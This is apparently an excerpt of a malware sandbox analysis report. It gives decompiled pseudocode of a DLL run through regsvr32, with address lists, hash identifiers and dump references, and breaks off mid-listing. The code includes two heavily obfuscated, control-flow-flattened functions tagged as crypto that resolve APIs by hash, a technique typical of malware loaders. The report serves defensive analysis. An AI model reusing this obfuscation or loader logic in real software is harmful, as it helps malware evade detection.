							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1000EA45( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x100947dc(_a4, _a8);
			}

0x1000eaa8
0x1000eabc
0x1000ead0
0x1000eae8
0x1000ead2
0x1000ead9
0x1000ead9
0x1000eaf0
0x00000000
0x1000eaf2
0x00000000
0x1000eaf9
0x1000eaf0
0x00000000
0x1000eabe
0x00000000

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecccca0988848a9c61c91e22488206499ef8c65bbe0a90d54c94cd99dd152774
Instruction ID: 15cf3ef85050be3fbe27979ac5470de729926d1036965cc6d83d023e6954e74e
Opcode Fuzzy Hash: ecccca0988848a9c61c91e22488206499ef8c65bbe0a90d54c94cd99dd152774
Instruction Fuzzy Hash: D7F01931608189ABFB16DF64CC49EAF3BA8FB053C0B118411FC1AE5065DB30EE54DB52

Uniqueness

Uniqueness Score: -1.00%

Function 1004697A Relevance: 4.5, APIs: 3, Instructions: 29
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1004697A(intOrPtr _a4) {
				intOrPtr _t6;
				void* _t13;

				_t6 = _a4;
				if( *((intOrPtr*)(_t6 + 4)) != 0x100 ||  *((intOrPtr*)(_t6 + 8)) != 0x70 || ( *(_t6 + 0xc) >> 0x00000010 & 0x00000040) != 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					return 0;
				} else {
					_t13 = 1;
					return _t13;
				}
			}

0x1004697a
0x10046986
0x00000000
0x100469ba
0x100469bc
0x00000000
0x100469bc

APIs

GetKeyState.USER32(00000010), ref: 100469A1
GetKeyState.USER32(00000011), ref: 100469AA
GetKeyState.USER32(00000012), ref: 100469B3

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: d9ad28029b542b96757fc05d135a8dcd94a6bdfbd2a6355a0c902ae43b2c12fe
Instruction ID: c8693b244d215d1b44a8f41ead80c0e3cf29843f8a80f8a2b581f842bef3ec64
Opcode Fuzzy Hash: d9ad28029b542b96757fc05d135a8dcd94a6bdfbd2a6355a0c902ae43b2c12fe
Instruction Fuzzy Hash: 32E0653554429ADDE640DA449D50F847698EB08FD0F268471EE84EB096D6F0EC4297AA

Uniqueness

Uniqueness Score: -1.00%

Function 003CFEF2 Relevance: 4.1, Strings: 3, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E003CFEF2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				char _v60;
				short _v608;
				short _v610;
				char _v612;
				signed int _v656;
				char _v1176;
				char _v1696;
				void* _t355;
				void* _t357;
				signed int _t358;
				signed int _t361;
				void* _t366;
				void* _t386;
				signed int _t397;
				signed int _t398;
				intOrPtr _t401;
				void* _t403;
				signed int _t404;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t417;
				signed int _t418;
				signed int _t420;
				signed int _t452;
				signed int _t453;
				void* _t456;
				void* _t457;

				_t401 = _a16;
				_push(_a20);
				_push(_t401);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t355);
				_t452 = _v24;
				_t457 = _t456 + 0x1c;
				_v28 = _v28 & 0x00000000;
				_t357 = 0x962ab;
				_v36 = 0x9f494;
				_v32 = 0xae765;
				_t453 = 0x67;
				while(1) {
					L1:
					_t403 = 0x2e;
					do {
						L2:
						while(_t357 == 0x1761a) {
							_v24 = 0x45845;
							_v24 = _v24 + 0xf99;
							_v24 = _v24 ^ 0x000467ce;
							_t358 = _v24;
							__eflags = _v656 & _t358;
							if((_v656 & _t358) == 0) {
								_t361 = _a20( &_v656,  &_v60);
								__eflags = _t361;
								if(_t361 != 0) {
									_t357 = 0xc820c;
									_t403 = 0x2e;
									goto L24;
								}
								_t357 = 0x5d5c2;
								while(1) {
									L1:
									_t403 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v612 - _t403;
							if(_v612 != _t403) {
								L19:
								__eflags = _a12;
								if(_a12 != 0) {
									_v16 = 0xcc466f;
									_v16 = _v16 ^ 0x54bef12d;
									_v16 = _v16 | 0x1233b86d;
									_v16 = _v16 + 0xffff2946;
									_v16 = _v16 ^ 0x56780f9a;
									_v12 = 0x3d572;
									_t414 = 0x3b;
									_v12 = _v12 / _t414;
									_t415 = 0x4c;
									_v12 = _v12 / _t415;
									_v12 = _v12 + 0x929a;
									_v12 = _v12 ^ 0x00029cfc;
									_v20 = 0xddf838;
									_v20 = _v20 ^ 0xf7de4047;
									_v20 = _v20 | 0xb5bf64cc;
									_v20 = _v20 ^ 0xf7b4960d;
									_v24 = 0x133100;
									_v24 = _v24 + 0x2cc3;
									_v24 = _v24 ^ 0x001b336b;
									_t366 = E003CD933(_v16, _v12, 0x3c1460, _v20, _v24);
									_v20 = 0xaecfb2;
									_v20 = _v20 >> 0xd;
									_t417 = 0x67;
									_v20 = _v20 / _t417;
									_t418 = 0x36;
									_v20 = _v20 / _t418;
									_v20 = _v20 ^ 0x000f61a6;
									_v16 = 0x7ebdcc;
									_v16 = _v16 + 0x8a4d;
									_v16 = _v16 * 0x61;
									_v16 = _v16 | 0x79f5139f;
									_v16 = _v16 ^ 0x79f04029;
									_v12 = 0x4d9bbd;
									_v12 = _v12 ^ 0x6e232389;
									_v12 = _v12 ^ 0xe64beea8;
									_v12 = _v12 + 0xf617;
									_v12 = _v12 ^ 0x882f79d5;
									_v24 = 0xc01f18;
									_v24 = _v24 << 7;
									_v24 = _v24 ^ 0x6009004c;
									E003D0E90(_t401, __eflags, _t418, _v16, _v12,  &_v612,  &_v1696, _v24, _t366);
									_v20 = 0x6c8dae;
									_v20 = _v20 ^ 0x14e6cbab;
									_v20 = _v20 | 0x106c3ca0;
									_v20 = _v20 ^ 0x14e9b6d7;
									_v16 = 0xcfe7fc;
									_v16 = _v16 | 0xffffb4fd;
									_v16 = _v16 ^ 0xfffa4e34;
									_v12 = 0x4c8121;
									_t420 = 0x49;
									_v12 = _v12 / _t420;
									_v12 = _v12 + 0xffffb009;
									_v12 = _v12 ^ 0x0002743a;
									E003CFEF2(_v20, _v16, _a4, _v12, _a12,  &_v1696, _a20);
									_v20 = 0x607f6;
									_t457 = _t457 + 0x3c;
									_v20 = _v20 | 0x86595fbc;
									_v20 = _v20 + 0xffff439a;
									_v20 = _v20 ^ 0x86521b24;
									_v12 = 0xcb9f14;
									_v12 = _v12 ^ 0x8024da0a;
									_v12 = _v12 ^ 0x64064cee;
									_v12 = _v12 << 5;
									_v12 = _v12 ^ 0x9d28ded4;
									_v16 = 0xce096;
									_v16 = _v16 + 0x4ecd;
									_v16 = _v16 | 0x5e88eccc;
									_v16 = _v16 ^ 0x5e82f07b;
									E003C43D3(_v20, _v12, _v16, _t366);
									_t403 = 0x2e;
									_t453 = 0x67;
								}
								L18:
								_t357 = 0xc820c;
								continue;
							}
							__eflags = _v610;
							if(_v610 == 0) {
								goto L18;
							}
							__eflags = _v610 - _t403;
							if(_v610 != _t403) {
								goto L19;
							}
							__eflags = _v608;
							if(_v608 != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t357 == 0x5d5c2) {
							_v24 = 0x33a674;
							_v24 = _v24 >> 9;
							_v24 = _v24 + 0x9e74;
							_v24 = _v24 ^ 0x000c7d99;
							_v20 = 0x45ebb6;
							_t404 = 0x21;
							_v20 = _v20 / _t404;
							_v20 = _v20 << 4;
							_v20 = _v20 ^ 0x00240d5d;
							_v16 = 0x27d09a;
							_v16 = _v16 + 0xffff45b4;
							_v16 = _v16 * 0x59;
							_v16 = _v16 ^ 0x0d9b9a5a;
							_v12 = 0xc473ff;
							_v12 = _v12 + 0xffffc02b;
							_v12 = _v12 + 0xffffb5e3;
							_v12 = _v12 * 0x23;
							_t349 =  &_v12;
							 *_t349 = _v12 ^ 0x1ac1a2e6;
							__eflags =  *_t349;
							return E003C4325(_v24, _v20, _v16, _t452, _v12);
						}
						if(_t357 == 0x61b93) {
							_v24 = 0xeb39a3;
							_v24 = _v24 ^ 0x6af7525c;
							_v24 = _v24 ^ 0x6a12b5de;
							_v16 = 0x950d43;
							_v16 = _v16 | 0xb3102c0b;
							_v16 = _v16 + 0xffff1eab;
							_v16 = _v16 ^ 0x0f68aa93;
							_v16 = _v16 ^ 0xbcf42a7d;
							_v20 = 0x25db8d;
							_v20 = _v20 | 0x904261dd;
							_v20 = _v20 + 0x1b34;
							_v20 = _v20 ^ 0x906157b0;
							_v12 = 0x22ae02;
							_v12 = _v12 ^ 0x6acf3948;
							_v12 = _v12 * 0x50;
							_v12 = _v12 << 0x10;
							_v12 = _v12 ^ 0x472cc5e7;
							_t386 = E003CD933(_v24, _v16, 0x3c1480, _v20, _v12);
							_v16 = 0x871348;
							_v16 = _v16 << 8;
							_v16 = _v16 << 0xb;
							_v16 = _v16 ^ 0x9a48f934;
							_v12 = 0x9c99ce;
							_v12 = _v12 | 0xf999a0f2;
							_v12 = _v12 + 0xffff08ba;
							_v12 = _v12 ^ 0xf99ad7d1;
							_v24 = 0x5b525f;
							_t407 = 0x70;
							_v24 = _v24 / _t407;
							_v24 = _v24 ^ 0x0002364d;
							E003C5E83(_t401, _v16,  &_v1176, _t407, _v12, _v24);
							_v16 = 0x58dfba;
							_t457 = _t457 + 0x20;
							_v16 = _v16 + 0xb013;
							_v16 = _v16 ^ 0x005b8e03;
							_v24 = 0xd55390;
							_v24 = _v24 ^ 0x42b5e47c;
							_v24 = _v24 ^ 0x4262917d;
							_v12 = 0x2f0815;
							_v12 = _v12 | 0x255b1f01;
							_v12 = _v12 << 0xc;
							_v12 = _v12 ^ 0xf1fe4772;
							E003C43D3(_v16, _v24, _v12, _t386);
							_t403 = 0x2e;
							_t357 = 0x830a6;
							_t453 = 0x67;
							continue;
						}
						if(_t357 == 0x830a6) {
							_v16 = 0x7a48ab;
							_v16 = _v16 * 0x32;
							_v16 = _v16 ^ 0x17e4576a;
							_v24 = 0xf74835;
							_v24 = _v24 / _t453;
							_v24 = _v24 ^ 0x0005ab57;
							_v12 = 0xe5ca04;
							_v12 = _v12 + 0xe361;
							_v12 = _v12 * 0x4a;
							_v12 = _v12 ^ 0x42a6b454;
							_t397 = E003D68D2(_v16,  &_v656, _v24, _v12,  &_v1176);
							_t452 = _t397;
							_t457 = _t457 + 0xc;
							__eflags = _t452 - 0xffffffff;
							if(_t452 == 0xffffffff) {
								return _t397;
							}
							_t357 = 0x1761a;
							while(1) {
								L1:
								_t403 = 0x2e;
								goto L2;
							}
						}
						if(_t357 == 0x962ab) {
							_v48 = _t401;
							_t357 = 0x61b93;
							continue;
						}
						if(_t357 != 0xc820c) {
							goto L24;
						}
						_v12 = 0xf8c18d;
						_v12 = _v12 + 0xffff1a0d;
						_v12 = _v12 ^ 0x9b802100;
						_v12 = _v12 << 0xb;
						_v12 = _v12 ^ 0xbfda48e6;
						_v16 = 0xfe9549;
						_v16 = _v16 + 0xffff668c;
						_v16 = _v16 >> 0xb;
						_v16 = _v16 | 0x2e1da3d3;
						_v16 = _v16 ^ 0x2e1d07f6;
						_v24 = 0x657e;
						_v24 = _v24 ^ 0xb5e5299f;
						_v24 = _v24 ^ 0xb5e94c49;
						_v20 = 0x52ac08;
						_v20 = _v20 >> 0xc;
						_v20 = _v20 + 0xfffff5cc;
						_v20 = _v20 >> 9;
						_v20 = _v20 ^ 0x007eabc6;
						_t398 = E003CDE8F(_t452,  &_v656, _v12, _v16, _v24, _v20);
						_t457 = _t457 + 0x10;
						asm("sbb eax, eax");
						_t357 = ( ~_t398 & 0xfffba058) + 0x5d5c2;
						goto L1;
						L24:
						__eflags = _t357 - 0xbef51;
					} while (_t357 != 0xbef51);
					return _t357;
				}
			}

0x003cfefc
0x003cff01
0x003cff04
0x003cff05
0x003cff08
0x003cff0b
0x003cff0e
0x003cff0f
0x003cff10
0x003cff15
0x003cff18
0x003cff1b
0x003cff1f
0x003cff24
0x003cff2b
0x003cff34
0x003cff35
0x003cff35
0x003cff37
0x003cff38
0x00000000
0x003cff38
0x003d0201
0x003d0208
0x003d020f
0x003d0216
0x003d0219
0x003d021f
0x003d0496
0x003d0499
0x003d049b
0x003d04a9
0x003d04ae
0x00000000
0x003d04ae
0x003d049d
0x003cff35
0x003cff35
0x003cff37
0x00000000
0x003cff37
0x003cff35
0x003d0225
0x003d022c
0x003d0255
0x003d0255
0x003d0259
0x003d025b
0x003d0264
0x003d026b
0x003d0272
0x003d0279
0x003d0280
0x003d028c
0x003d0291
0x003d0299
0x003d029c
0x003d029f
0x003d02a6
0x003d02ad
0x003d02b4
0x003d02bb
0x003d02c2
0x003d02c9
0x003d02d0
0x003d02d7
0x003d02ef
0x003d02f4
0x003d02fe
0x003d030b
0x003d0310
0x003d0318
0x003d031c
0x003d0321
0x003d0328
0x003d032f
0x003d033a
0x003d0343
0x003d034a
0x003d0351
0x003d0358
0x003d035f
0x003d0366
0x003d036d
0x003d0374
0x003d037b
0x003d037f
0x003d039b
0x003d03a0
0x003d03aa
0x003d03b1
0x003d03b8
0x003d03bf
0x003d03c8
0x003d03cf
0x003d03d6
0x003d03e2
0x003d03e8
0x003d03f1
0x003d03f8
0x003d040f
0x003d0414
0x003d041b
0x003d041e
0x003d0425
0x003d042c
0x003d0433
0x003d043a
0x003d0441
0x003d0448
0x003d044c
0x003d0453
0x003d045a
0x003d0461
0x003d0468
0x003d0479
0x003d0482
0x003d0485
0x003d0485
0x003d024b
0x003d024b
0x00000000
0x003d024b
0x003d022e
0x003d0236
0x00000000
0x00000000
0x003d0238
0x003d023f
0x00000000
0x00000000
0x003d0241
0x003d0249
0x00000000
0x00000000
0x00000000
0x003d0249
0x003cff48
0x003d04bf
0x003d04c8
0x003d04cc
0x003d04d3
0x003d04da
0x003d04e6
0x003d04e9
0x003d04ec
0x003d04f0
0x003d04f7
0x003d04fe
0x003d0509
0x003d050c
0x003d0513
0x003d051a
0x003d0521
0x003d052c
0x003d052f
0x003d052f
0x003d052f
0x00000000
0x003d0548
0x003cff53
0x003d00a4
0x003d00ab
0x003d00b2
0x003d00b9
0x003d00c0
0x003d00c7
0x003d00ce
0x003d00d5
0x003d00dc
0x003d00e3
0x003d00ea
0x003d00f1
0x003d00f8
0x003d00ff
0x003d010a
0x003d010d
0x003d0111
0x003d0129
0x003d012e
0x003d0138
0x003d013e
0x003d0144
0x003d014b
0x003d0152
0x003d0159
0x003d0160
0x003d0167
0x003d0173
0x003d0178
0x003d0181
0x003d0195
0x003d019a
0x003d01a1
0x003d01a4
0x003d01ab
0x003d01b2
0x003d01b9
0x003d01c0
0x003d01c7
0x003d01ce
0x003d01d5
0x003d01d9
0x003d01ea
0x003d01f3
0x003d01f6
0x003d01fb
0x00000000
0x003d01fb
0x003cff5e
0x003d0028
0x003d0035
0x003d0038
0x003d003f
0x003d0051
0x003d0054
0x003d005b
0x003d0062
0x003d006d
0x003d0076
0x003d0087
0x003d008c
0x003d008e
0x003d0091
0x003d0094
0x003d0551
0x003d0551
0x003d009a
0x003cff35
0x003cff35
0x003cff37
0x00000000
0x003cff37
0x003cff35
0x003cff69
0x003d001b
0x003d001e
0x00000000
0x003d001e
0x003cff74
0x00000000
0x00000000
0x003cff7a
0x003cff87
0x003cff90
0x003cff97
0x003cff9b
0x003cffa2
0x003cffa9
0x003cffb0
0x003cffb4
0x003cffbb
0x003cffc2
0x003cffc9
0x003cffd0
0x003cffd7
0x003cffde
0x003cffe2
0x003cffe9
0x003cffed
0x003d0000
0x003d0005
0x003d000a
0x003d0011
0x00000000
0x003d04af
0x003d04af
0x003d04af
0x00000000
0x003cff38

Strings

e, xrefs: 003CFF2B
_R[, xrefs: 003D0167
]$, xrefs: 003D04F0

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ]$$_R[$e
API String ID: 0-150726264
Opcode ID: 01b27d579cd7fba3cc93fbb6bea116b070b52bd0744530b6499aa1f13126345f
Instruction ID: 34f1b145a7d768b169e9a1c0deacc11727f5f81d03bdd07f1a7ad84575ba74f2
Opcode Fuzzy Hash: 01b27d579cd7fba3cc93fbb6bea116b070b52bd0744530b6499aa1f13126345f
Instruction Fuzzy Hash: 7D0236B1D0021EABCF19CFE1D88AAEEBBB1FB40314F208599D525B6260D3B44B55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 003DEECF Relevance: 4.0, Strings: 3, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003DEECF(signed int __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t264;
				void* _t268;
				signed int _t288;
				signed int _t302;
				signed int _t304;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t318;
				signed int _t339;
				void* _t340;
				signed int _t342;
				signed int _t343;
				signed int* _t344;

				_t344 =  &_v160;
				_v136 = __ecx;
				_t264 = 0x7ddb5;
				_t343 = _v136;
				_t302 = _v136;
				_t339 = _v136;
				_v144 = 0xc2ddb;
				while(1) {
					L1:
					_t340 = 0x231fa;
					do {
						while(_t264 != _t340) {
							if(_t264 == 0x3d61a) {
								_v144 = 0x728959;
								_v144 = _v144 ^ 0x06b3bbe5;
								_v144 = _v144 ^ 0x06c172bc;
								_t343 = _v144;
								_v160 = 0x587a85;
								_t310 = 3;
								_push(_t310);
								_v160 = _v160 / _t310;
								_v160 = _v160 ^ 0xa818d737;
								_v160 = _v160 ^ 0xa8093215;
								_v140 = 0xe05bb1;
								_push(_t310);
								_v140 = _v140 * 0x42;
								_v140 = _v140 ^ 0x39d96805;
								_v144 = 0x6e9ec1;
								_v144 = _v144 * 0x27;
								_v144 = _v144 ^ 0x10dbc6b2;
								_t302 = E003C8D52(_t310, _t343, __eflags);
								__eflags = _t302;
								_t264 =  !=  ? _t340 : 0x99aab;
								goto L14;
							} else {
								if(_t264 == 0x4404e) {
									_v156 = 0xff7851;
									_v156 = _v156 >> 8;
									_v156 = _v156 << 0xd;
									_v156 = _v156 + 0x603;
									_v156 = _v156 ^ 0x1fef0602;
									_v152 = 0x884756;
									_v152 = _v152 << 0xc;
									_v152 = _v152 ^ 0x84756010;
									_v160 = 0xaa1b93;
									_v160 = _v160 + 0xffff2a2d;
									_v160 = _v160 ^ 0x00a56901;
									_v148 = 0xe4195;
									_v148 = _v148 << 1;
									_v148 = _v148 + 0xffff3ac6;
									_v148 = _v148 << 1;
									_v148 = _v148 ^ 0x0031d952;
									_push(_t309);
									_t288 = E003C2B6C(_v156, _v152);
									_v160 = 0x1b76d1;
									_t343 = _t288;
									_v160 = _v160 * 0x1a;
									_v160 = _v160 << 0xe;
									_v160 = _v160 ^ 0x84437153;
									_v156 = 0xafeb7a;
									_v156 = _v156 ^ 0xe68d7566;
									_v156 = _v156 * 6;
									_v156 = _v156 >> 2;
									_v156 = _v156 ^ 0x193decfb;
									_v132 = 0x1a6d2d;
									_v132 = _v132 << 3;
									_v132 = _v132 ^ 0x00d7dcee;
									_v152 = 0x1365fc;
									_v152 = _v152 + 0xffff0d0e;
									_v152 = _v152 + 0xffff5cf4;
									_v152 = _v152 ^ 0x001100c1;
									_v144 = 0x338c25;
									_v144 = _v144 << 0xe;
									_v144 = _v144 ^ 0xe3094008;
									_v148 = 0xb66cdd;
									_v148 = _v148 << 0xa;
									_v148 = _v148 ^ 0x96491152;
									_v148 = _v148 ^ 0x4ffa6553;
									_v140 = 0x4b8fbd;
									_v140 = _v140 | 0x32849267;
									_v140 = _v140 ^ 0x32cf9ffd;
									__eflags = _v140 | _v148 | _v144;
									E003CAF67(_v160, _v140 | _v148 | _v144,  &_v128, _v156, _t343, _v132, _v152);
									_t344 =  &(_t344[7]);
									_t264 = 0x58e03;
									L14:
									_t309 = _v136;
									continue;
								} else {
									if(_t264 == 0x58e03) {
										_v148 = 0x954c7a;
										_t342 = 0x7f;
										_v148 = _v148 * 0x1c;
										_v148 = _v148 ^ 0x8092ae11;
										_v148 = _v148 ^ 0x90ca5ded;
										_v156 = 0x2b6464;
										_v156 = _v156 << 0xb;
										_v156 = _v156 / _t342;
										_v156 = _v156 ^ 0x00b4219d;
										_v160 = 0xa974d7;
										_v160 = _v160 * 0x2f;
										_v160 = _v160 ^ 0x1f15fb22;
										_v152 = 0x5e8d80;
										_v152 = _v152 * 0x1e;
										_v152 = _v152 << 8;
										_v152 = _v152 ^ 0x1495ce71;
										_t339 = E003D8EF4( *((intOrPtr*)(_t309 + 4)), _v148, _v156, _v160,  *_t309, _v152);
										_t344 =  &(_t344[4]);
										__eflags = _t339;
										if(__eflags != 0) {
											_t309 = _v136;
											_t264 = 0x3d61a;
											goto L1;
										}
									} else {
										if(_t264 == 0x7ddb5) {
											_t264 = 0x4404e;
											continue;
										} else {
											if(_t264 != 0x99aab) {
												goto L17;
											} else {
												_v152 = 0x4dd45f;
												_v152 = _v152 + 0xc790;
												_v152 = _v152 ^ 0x2e490a9e;
												_v152 = _v152 ^ 0x467295fc;
												_v152 = _v152 ^ 0x687f098d;
												_v160 = 0xd1cb7c;
												_v160 = _v160 >> 0xe;
												_t318 = 0x5b;
												_v160 = _v160 * 0x41;
												_v160 = _v160 ^ 0x000d7a98;
												_v148 = 0x4c2d5a;
												_v148 = _v148 >> 3;
												_v148 = _v148 + 0xffff5ab8;
												_v148 = _v148 ^ 0x000951b1;
												_v156 = 0x35e29;
												_v156 = _v156 + 0x9fd2;
												_v156 = _v156 / _t318;
												_v156 = _v156 | 0x219ee3ca;
												_v156 = _v156 ^ 0x219bb863;
												E003C79D0(_v152, _v160, _v156, _v148, _t339, _v156);
											}
										}
									}
								}
							}
							L9:
							return _t302;
						}
						_v156 = 0x96296a;
						_t304 = 0x21;
						_v156 = _v156 * 0x46;
						_v156 = _v156 + 0x4aa4;
						_v156 = _v156 + 0x7bc7;
						_v156 = _v156 ^ 0x291317c2;
						_v152 = 0xd2b228;
						_v152 = _v152 + 0x43e;
						_v152 = _v152 / _t304;
						_v152 = _v152 ^ 0x00065b06;
						_v160 = 0x8ff6e2;
						_v160 = _v160 ^ 0x33302125;
						_v160 = _v160 | 0x1412bf8c;
						_v160 = _v160 ^ 0x37b1e021;
						_v144 = 0xf8586c;
						_v144 = _v144 >> 3;
						_v144 = _v144 ^ 0x001895f2;
						_t268 = E003CD933(_v156, _v152, 0x3c17e4, _v160, _v144);
						_push(_t339);
						_push( &_v128);
						_push(_t268);
						_push(_t343);
						_push(_t302);
						 *((intOrPtr*)(E003CAE46(0xa56d57e4, 0xcc)))();
						_v144 = 0x744391;
						_v144 = _v144 + 0xfffff7fe;
						_v144 = _v144 ^ 0x007b2093;
						_v152 = 0x3f934;
						_t307 = 0xe;
						_v152 = _v152 / _t307;
						_v152 = _v152 * 0x5d;
						_v152 = _v152 ^ 0x001e88d8;
						_v160 = 0x3959f1;
						_v160 = _v160 << 4;
						_v160 = _v160 + 0xdfb;
						_t258 =  &_v160;
						 *_t258 = _v160 ^ 0x03957e3b;
						__eflags =  *_t258;
						E003C43D3(_v144, _v152, _v160, _t268);
						_t309 = _v136;
						_t344 =  &(_t344[0xa]);
						_t264 = 0x99aab;
						_t340 = 0x231fa;
						L17:
						__eflags = _t264 - 0xfadc0;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x003deecf
0x003deed7
0x003deedb
0x003deee0
0x003deee4
0x003deeea
0x003deeee
0x003deef6
0x003deef6
0x003deef6
0x003deefb
0x003deefb
0x003def08
0x003df237
0x003df241
0x003df249
0x003df251
0x003df255
0x003df263
0x003df266
0x003df267
0x003df26d
0x003df275
0x003df27d
0x003df28a
0x003df28b
0x003df28f
0x003df297
0x003df2a4
0x003df2a8
0x003df2c1
0x003df2c8
0x003df2cc
0x00000000
0x003def0e
0x003def13
0x003df0b5
0x003df0bd
0x003df0c2
0x003df0c7
0x003df0cf
0x003df0d7
0x003df0df
0x003df0e4
0x003df0ec
0x003df0f4
0x003df0fc
0x003df104
0x003df10c
0x003df110
0x003df118
0x003df11c
0x003df12c
0x003df135
0x003df13a
0x003df142
0x003df14d
0x003df151
0x003df156
0x003df15e
0x003df166
0x003df173
0x003df177
0x003df17c
0x003df184
0x003df18c
0x003df191
0x003df199
0x003df1a1
0x003df1a9
0x003df1b1
0x003df1b9
0x003df1c1
0x003df1c6
0x003df1ce
0x003df1d6
0x003df1db
0x003df1e3
0x003df1eb
0x003df1f3
0x003df1fb
0x003df218
0x003df221
0x003df226
0x003df229
0x003df22e
0x003df22e
0x00000000
0x003def19
0x003def1e
0x003df004
0x003df015
0x003df016
0x003df01a
0x003df022
0x003df02a
0x003df032
0x003df03d
0x003df041
0x003df049
0x003df056
0x003df05a
0x003df062
